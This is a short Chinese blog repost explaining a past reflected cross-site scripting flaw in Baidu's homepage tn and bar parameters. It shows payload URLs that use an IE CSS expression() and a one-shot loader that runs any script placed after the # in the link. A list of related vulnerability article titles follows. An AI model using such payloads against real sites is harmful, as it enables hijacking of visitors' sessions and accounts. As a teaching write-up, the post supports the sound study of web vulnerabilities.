一个典型的参数型跨站脚本漏洞
拿百度主页曾经的一个XSS做个演示,这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS:
http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert(‘xss‘));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert(‘xss‘));
tn和bar两个参数对应在页面的输出是两个input表单值,可以使用”(双引号)闭合表单值,加入CSS属性跨站,页面具体输出如下:
<input type=hidden name=tn value=""/**/style=xss:expression(alert(‘xss‘));">
这个漏洞只能在IE下使用,FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色,这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码:
eval(unescape(location.hash.substr(1)))
给window对象的方法定义一个值,判断这个值运行一次代码:
(window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1
最后得到完美的攻击链接:
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29
转载于:https://www.cnblogs.com/itchong/p/abcd9.html
一个典型的参数型跨站脚本漏洞相关推荐
- pplive网站存在存储型跨站脚本漏洞
漏洞详情 披露状态: 2010-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2010-08-03: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 存储型 详细说明: 登录后选择修 ...
- WordPress podPress插件‘playerID’参数跨站脚本漏洞
漏洞名称: WordPress podPress插件'playerID'参数跨站脚本漏洞 CNNVD编号: CNNVD-201303-206 发布时间: 2013-03-13 更新时间: 2013-0 ...
- WordPress yolink Search插件‘s’参数跨站脚本漏洞
漏洞名称: WordPress yolink Search插件's'参数跨站脚本漏洞 CNNVD编号: CNNVD-201302-073 发布时间: 2013-02-05 更新时间: 2013-02- ...
- xss 跨站脚本漏洞 php,跨站脚本漏洞(XSS)基础讲解
XSS漏洞 一.文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一.如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞. 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS ...
- XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决
XSS(跨站脚本)漏洞详解 XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆, ...
- [ 常见漏洞篇 ]常见web漏洞总结------XSS跨站脚本漏洞
本文简单的总结了一下XSS的知识点 主要是从面试的角度来总结的 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一.XSS形成原因: 二.XSS分类: 1. 反射型XSS 2. 存储型XS ...
- c++ error函数_Linux中create_elf_tables函数整型溢出漏洞分析(CVE201814634)
在这篇文章中,我们将跟大家分析Linux平台中createelftables函数的一个整型溢出漏洞(CVE-2018-14634). 概述 在近期的一次安全分析过程中,我们在64位Linux系统内核里 ...
- WordPress Platinum SEO插件跨站脚本漏洞
漏洞名称: WordPress Platinum SEO插件跨站脚本漏洞 CNNVD编号: CNNVD-201309-398 发布时间: 2013-09-24 更新时间: 2013-09-24 危害等 ...
- WordPress BuddyPress Extended Friendship Request插件跨站脚本漏洞
漏洞名称: WordPress BuddyPress Extended Friendship Request插件跨站脚本漏洞 CNNVD编号: CNNVD-201307-609 发布时间: 2013- ...
最新文章
- PyTorch框架:(6)图像识别实战常用模块解读
- 老生常谈--GetROProperty,GetTOProperty,SetTOProperty的区别
- vue-router之 beforeRouteEnter
- java怎么播放不了声音,java – 为什么这段代码不播放声音文件
- 功率驱动电路中元件的选择
- ubuntu1804系统设置在哪里_电销呼叫系统CRM功能设计
- Java注解原理解析 转载至:梅仁
- React Native运行原理解析
- oracle 字段和当前时间比较,请教如何按照当前时间与数据库表中的字段时间比较提取记录,涉及跨天...
- 小米4C未解锁刷机教程
- 凤凰系统(Phoenix OS)PC版安装,电脑上体验功能丰富的安卓系统
- 新手练字又快又好的方法
- Verilog HDL实现智能药盒
- C#生成Word文档
- 弄明白了清华校训“自强不息 厚德载物”的来龙去脉
- 如何掌握电烙铁焊接技术
- 从今开始,两耳不闻窗外事,一心搞dp
- 九步!让你从零基础学习python成为一名开源程序员!
- ded汉语意思_DED是什么意思
- SSMS18.9.1证书被颁发者直接吊销
热门文章
- 【牛客 - 185F】 假的数学游戏(斯特林公式,大数Java打表)
- 【HDU - 1285】确定比赛名次 (拓扑排序)
- unsigned int mysql_mysql 中int类型字段unsigned和signed的探索
- 大量html乱码seo,HTTPS改造之后网页错位乱码,影响SEO和正常访问,应该这样改
- php整站防注入程序,一个不错的php通用防注入程序
- 编写程序,随机产生20个0到1之间的数,将这20个数写入文本文件中,要求每行5个数
- 铜仁计算机专业学校,听说计算机专业的在本部啊 这是真的么
- 硬件结构图_那曲地表水电子除垢仪结构图
- C++ 右值引用 | 左值、右值、move、移动语义、引用限定符
- leetcode86. 分隔链表